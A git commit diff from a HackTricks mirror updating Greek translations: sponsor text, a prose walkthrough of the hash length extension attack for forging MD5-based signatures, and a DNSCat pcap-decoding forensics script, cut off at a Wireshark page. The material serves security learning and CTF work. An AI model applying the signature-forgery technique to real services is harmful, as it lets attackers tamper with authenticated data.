mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.
This commit is contained in:
parent
dba3d22560
commit
82cce286ce
35 changed files with 920 additions and 817 deletions
38
README.md
38
README.md
|
@ -5,22 +5,22 @@
|
|||
_Τα λογότυπα και το σχεδιασμό κίνησης του Hacktricks από_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
|
||||
|
||||
{% hint style="success" %}
|
||||
**Καλώς ήρθατε στο wiki όπου θα βρείτε κάθε κόλπο/τεχνική/ό,τι έχω μάθει από CTFs, εφαρμογές στην πραγματική ζωή, αναγνώσεις έρευνας και ειδήσεις.**
|
||||
**Καλώς ήρθατε στο wiki όπου θα βρείτε κάθε κόλπο/τεχνική/ό,τι έχω μάθει από CTFs, εφαρμογές στην πραγματική ζωή, αναγνώσεις ερευνών και ειδήσεις.**
|
||||
{% endhint %}
|
||||
|
||||
Για να ξεκινήσετε, ακολουθήστε αυτήν τη σελίδα όπου θα βρείτε την **κανονική ροή** που **πρέπει να ακολουθήσετε κατά τον έλεγχο ασφάλειας** ενός ή περισσότερων **μηχανημάτων:**
|
||||
Για να ξεκινήσετε ακολουθήστε αυτήν τη σελίδα όπου θα βρείτε την **κανονική ροή** που **πρέπει να ακολουθήσετε κατά τον ελέγχο ασφάλειας** ενός ή περισσότερων **μηχανημάτων:**
|
||||
|
||||
{% content-ref url="generic-methodologies-and-resources/pentesting-methodology.md" %}
|
||||
[pentesting-methodology.md](generic-methodologies-and-resources/pentesting-methodology.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Εταιρικοί Χορηγοί
|
||||
## Χορηγοί Επιχειρήσεων
|
||||
|
||||
### [STM Cyber](https://www.stmcyber.com)
|
||||
|
||||
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**STM Cyber**](https://www.stmcyber.com) είναι μια εξαιρετική εταιρεία κυβερνοασφάλειας της οποίας το σύνθημα είναι **HACK THE UNHACKABLE**. Διεξάγουν τη δική τους έρευνα και αναπτύσσουν τα δικά τους εργαλεία χάκερ για να **προσφέρουν αρκετές αξιόλογες υπηρεσίες κυβερνοασφάλειας** όπως ελεγκτικές δοκιμές, Κόκκινες Ομάδες και εκπαίδευση.
|
||||
[**STM Cyber**](https://www.stmcyber.com) είναι μια εξαιρετική εταιρεία κυβερνοασφάλειας του συνθήματος **HACK THE UNHACKABLE**. Διεξάγουν τη δική τους έρευνα και αναπτύσσουν τα δικά τους εργαλεία χάκερ για να **προσφέρουν αρκετές αξιόλογες υπηρεσίες κυβερνοασφάλειας** όπως ελεγκτικές δοκιμές, Κόκκινες Ομάδες και εκπαίδευση.
|
||||
|
||||
Μπορείτε να ελέγξετε το **blog** τους στο [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
|
||||
|
||||
|
@ -32,7 +32,7 @@ _Τα λογότυπα και το σχεδιασμό κίνησης του Hack
|
|||
|
||||
<figure><img src=".gitbook/assets/image (42).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com) είναι το πιο σημαντικό συνέδριο κυβερνοασφάλειας στην **Ισπανία** και ένα από τα πιο σημαντικά στην **Ευρώπη**. Με **αποστολή την προώθηση της τεχνικής γνώσης**, αυτό το συνέδριο είναι ένας ζωηρός σημείο συνάντησης για επαγγελματίες τεχνολογίας και κυβερνοασφάλειας σε κάθε πεδίο.
|
||||
[**RootedCON**](https://www.rootedcon.com) είναι το πιο σημαντικό συνέδριο κυβερνοασφάλειας στην **Ισπανία** και ένα από τα πιο σημαντικά στην **Ευρώπη**. Με **αποστολή την προώθηση της τεχνικής γνώσης**, αυτό το συνέδριο είναι ένας ζωντανός χώρος συνάντησης για επαγγελματίες τεχνολογίας και κυβερνοασφάλειας σε κάθε πεδίο.
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
|
@ -44,7 +44,7 @@ _Τα λογότυπα και το σχεδιασμό κίνησης του Hack
|
|||
|
||||
**Η Intigriti** είναι η **#1 στην Ευρώπη** στην ηθική χρήση και την **πλατφόρμα ανταμοιβής ευρημάτων ευπάθειας.**
|
||||
|
||||
**Συμβουλή ανταμοιβής ευρημάτων:** **Εγγραφείτε** στην **Intigriti**, μια προηγμένη **πλατφόρμα ανταμοιβής ευρημάτων ευπάθειας δημιουργημένη από χάκερς, για χάκερς**! Γίνετε μέλος στο [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) σήμερα και αρχίστε να κερδίζετε ανταμοιβές έως και **$100,000**!
|
||||
**Συμβουλή ανταμοιβής ευπάθειας:** **Εγγραφείτε** στην **Intigriti**, μια προηγμένη **πλατφόρμα ανταμοιβής ευπάθειας δημιουργημένη από χάκερς, για χάκερς**! Γίνετε μέλος στο [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) σήμερα και αρχίστε να κερδίζετε ανταμοιβές έως και **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
|
@ -67,11 +67,11 @@ _Τα λογότυπα και το σχεδιασμό κίνησης του Hack
|
|||
|
||||
<figure><img src=".gitbook/assets/image (47).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Συμμετέχετε στον διακομιστή [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) για να επικοινωνήσετε με έμπειρους χάκερς και κυνηγούς ανταμοιβής ευρημάτων!
|
||||
Συμμετέχετε στον διακομιστή [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) για επικοινωνία με έμπειρους χάκερ και κυνηγούς ανταμοιβής ευπάθειας!
|
||||
|
||||
* **Εισαγωγή στο Χάκινγκ:** Συμμετέχετε σε περιεχόμενο που εξετάζει την αγωνία και τις προκλήσεις του χάκινγκ
|
||||
* **Ειδήσεις Χάκινγκ σε Πραγματικό Χρόνο:** Μείνετε ενήμεροι με τον γρήγορο ρυθμό του κόσμου του χάκινγκ μέσω ειδήσεων και αναλύσεων σε πραγματικό χρόνο
|
||||
* **Τελευταίες Ανακοινώσεις:** Μείνετε ενήμεροι με τις νεότερες ανταμοιβές ευρημάτων που ξεκινούν και τις κρίσιμες ενημερώσεις πλατφόρμας
|
||||
* **Τελευταίες Ανακοινώσεις:** Μείνετε ενήμεροι με τις νεότερες ανταμοιβές ευπάθειας που ξεκινούν και τις κρίσιμες ενημερώσεις της πλατφόρμας
|
||||
|
||||
**Συμμετέχετε στο** [**Discord**](https://discord.com/invite/N3FrSbmwdy) και αρχίστε να συνεργάζεστε με κορυφαίους χάκερ σήμερα!
|
||||
|
||||
|
@ -94,9 +94,9 @@ _Τα λογότυπα και το σχεδιασμό κίνησης του Hack
|
|||
Η SerpApi προσφέρει γρήγορες και εύκολες πραγματικές APIs για **πρόσβαση στα αποτελέσματα αναζήτησης στις μηχανές αναζήτησης**. Ανακαλύπτουν μηχανές αναζήτησης, χειρίζονται διακομιστές μεσολάβησης, λύνουν captchas και αναλύουν όλα τα πλούσια δομημένα δεδομένα για εσάς.
|
||||
|
||||
Η συνδρομή σε ένα από τα σχέδια της SerpApi περιλαμβάνει πρόσβαση σε πάνω από 50 διαφορετικές APIs για την ανάκτηση δεδομένων από διάφορες μηχανές αναζήτησης, συμπεριλαμβανομένων Google, Bing, Baidu, Yahoo, Yandex και άλλων.\
|
||||
Αντίθετα με άλλους παρόχους, η **SerpApi δεν απλά ανακτά οργανικά αποτελέσματα**. Οι απαντήσεις της SerpApi περιλαμβάνουν συνεχώς όλες τις διαφημίσεις, ενσωματωμένες εικόνες και βίντεο, γνωστικά γραφήματα και άλλα στοιχεία και χαρακτηριστικά που υπάρχουν στα αποτελέσματα αναζήτησης.
|
||||
Σε αντίθεση με άλλους παρόχους, η **SerpApi δεν ανακτά μόνο οργανικά αποτελέσματα**. Οι απαντήσεις της SerpApi περιλαμβάνουν συνεχώς όλες τις διαφημίσεις, εικόνες και βίντεο, γνωσιακούς γράφους και άλλα στοιχεία και χαρακτηριστικά που υπάρχουν στα αποτελέσματα αναζήτησης.
|
||||
|
||||
Οι τρέχοντες πελάτες της SerpApi περιλαμβάνουν **Apple, Shopify και GrubHub**.\
|
||||
Οι τρέχοντες πελάτες της SerpApi περιλαμβάνουν την **Apple, την Shopify και την GrubHub**.\
|
||||
Για περισσότερες πληροφορίες ελέγξτε το [**blog**](https://serpapi.com/blog/) τους, ή δοκιμάστε ένα παράδειγμα στο [**παιχνίδι**](https://serpapi.com/playground) τους.\
|
||||
Μπορείτε να **δημιουργήσετε ένα δωρεάν λογαριασμό** [**εδώ**](https://serpapi.com/users/sign\_up)**.**
|
||||
|
||||
|
@ -114,14 +114,16 @@ _Τα λογότυπα και το σχεδιασμό κίνησης του Hack
|
|||
|
||||
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WebSec**](https://websec.nl) είναι μια επαγγελματική εταιρεία κυβερνοασφάλειας με έδρα το **Άμστερνταμ** που βοηθάει στην **προστασία** επιχειρήσεων **σε όλο τον κόσμο** από τις τελευταίες κυβερνοασφάλειας απειλές παρέχοντας υπηρεσίες **επιθετικής ασφάλειας** με μια **σύγχρονη** προσέγγ
|
||||
## WhiteIntel
|
||||
[**WebSec**](https://websec.nl) είναι μια επαγγελματική εταιρεία κυβερνοασφάλειας με έδρα το **Άμστερνταμ** που βοηθάει στην **προστασία** επιχειρήσεων **σε όλο τον κόσμο** ενάντια στις τελευταίες κυβερνοασφάλειας απειλές παρέχοντας υπηρεσίες **επιθετικής ασφάλειας** με μια **σύγχρονη** προσέγγιση.
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
Η WebSec είναι μια **
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες malware**.
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από malware που κλέβει πληροφορίες.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες malware**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των απαγωγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από malware που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
|
@ -141,10 +143,10 @@ _Τα λογότυπα και το σχεδιασμό κίνησης του Hack
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks στο AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
|
@ -8,17 +8,17 @@
|
|||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του GitHub.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -34,22 +34,22 @@
|
|||
* **Τα δεδομένα καθαρού κειμένου**
|
||||
* **Τον αλγόριθμο (και την ευπάθειά του σε αυτήν την επίθεση)**
|
||||
* **Το padding είναι γνωστό**
|
||||
* Συνήθως χρησιμοποιείται ένα προεπιλεγμένο, οπότε αν πληρούνται τα άλλα 3 απαιτήσεις, αυτό επίσης είναι
|
||||
* Συνήθως χρησιμοποιείται ένα προεπιλεγμένο, οπότε αν πληρούνται οι άλλες 3 απαιτήσεις, αυτό επίσης είναι
|
||||
* Το padding διαφέρει ανάλογα με το μήκος του μυστικού+δεδομένων, γι' αυτό χρειάζεται το μήκος του μυστικού
|
||||
|
||||
Τότε, είναι δυνατό για έναν **εισβολέα** να **προσαρτήσει** **δεδομένα** και να **δημιουργήσει** ένα έγκυρο **υπογραφή** για τα **προηγούμενα δεδομένα + τα προσαρτημένα δεδομένα**.
|
||||
Τότε, είναι δυνατό για έναν **επιτιθέμενο** να **προσαρτήσει** **δεδομένα** και να **δημιουργήσει** μια έγκυρη **υπογραφή** για τα **προηγούμενα δεδομένα + τα προσαρτημένα δεδομένα**.
|
||||
|
||||
## Πώς;
|
||||
|
||||
Βασικά, οι ευάλωτοι αλγόριθμοι δημιουργούν τα κατακερματισμένα δεδομένα αρχικά με το **κατακερματισμό ενός τμήματος δεδομένων**, και στη συνέχεια, **από** το **προηγούμενα** δημιουργημένο **κατακερματισμένο δεδομένο** (κατάσταση), **προσθέτουν το επόμενο τμήμα δεδομένων** και το **κατακερματίζουν**.
|
||||
|
||||
Στη συνέχεια, φανταστείτε ότι το μυστικό είναι "μυστικό" και τα δεδομένα είναι "δεδομένα", το MD5 του "μυστικόδεδομένα" είναι 6036708eba0d11f6ef52ad44e8b74d5b.\
|
||||
Αν ένας εισβολέας θέλει να προσαρτήσει τη συμβολοσειρά "προσάρτημα" μπορεί:
|
||||
Αν ένας επιτιθέμενος θέλει να προσαρτήσει τη συμβολοσειρά "προσάρτηση" μπορεί:
|
||||
|
||||
* Να δημιουργήσει ένα MD5 από 64 "Α"
|
||||
* Να αλλάξει την κατάσταση του προηγουμένως αρχικοποιημένου κατακερματισμένου σε 6036708eba0d11f6ef52ad44e8b74d5b
|
||||
* Να προσαρτήσει τη συμβολοσειρά "προσάρτημα"
|
||||
* Να ολοκληρώσει τον κατακερματισμό και το αποτέλεσμα θα είναι μια **έγκυρη για το "μυστικό" + "δεδομένα" + "padding" + "προσάρτημα"** υπογραφή
|
||||
* Να προσαρτήσει τη συμβολοσειρά "προσάρτηση"
|
||||
* Να ολοκληρώσει τον κατακερματισμό και το τελικό κατακερματισμένο δεδομένο θα είναι ένα **έγκυρο για το "μυστικό" + "δεδομένα" + "padding" + "προσάρτηση"**
|
||||
|
||||
## **Εργαλείο**
|
||||
|
||||
|
@ -59,13 +59,13 @@
|
|||
|
||||
Μπορείτε να βρείτε αυτήν την επίθεση καλά εξηγημένη στο [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -73,7 +73,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks στο AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
|
@ -81,6 +81,6 @@
|
|||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,21 +1,34 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρός Συνεργάτης AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
Εάν έχετε pcap με δεδομένα που **εξαφανίζονται από το DNSCat** (χωρίς κρυπτογράφηση), μπορείτε να βρείτε το εξαφανισμένο περιεχόμενο.
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Χρειάζεστε μόνο να γνωρίζετε ότι τα **πρώτα 9 bytes** δεν είναι πραγματικά δεδομένα, αλλά σχετίζονται με την **επικοινωνία C\&C**:
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
Αν έχετε pcap με δεδομένα που **εξαγάγονται από το DNSCat** (χωρίς χρήση κρυπτογράφησης), μπορείτε να βρείτε το εξαγόμενο περιεχόμενο.
|
||||
|
||||
Χρειάζεστε μόνο να γνωρίζετε ότι τα **πρώτα 9 bytes** δεν είναι πραγματικά δεδομένα αλλά σχετίζονται με τη **επικοινωνία C\&C**:
|
||||
```python
|
||||
from scapy.all import rdpcap, DNSQR, DNSRR
|
||||
import struct
|
||||
|
@ -38,20 +51,20 @@ last = qry
|
|||
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
|
||||
|
||||
|
||||
Υπάρχει ένα σενάριο που λειτουργεί με Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
|
||||
Υπάρχει ένα script που λειτουργεί με Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
|
||||
```
|
||||
python3 dnscat_decoder.py sample.pcap bad_domain
|
||||
```
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,75 +1,87 @@
|
|||
# Κόλπα Wireshark
|
||||
|
||||
## Κόλπα Wireshark
|
||||
|
||||
<details>
|
||||
|
||||
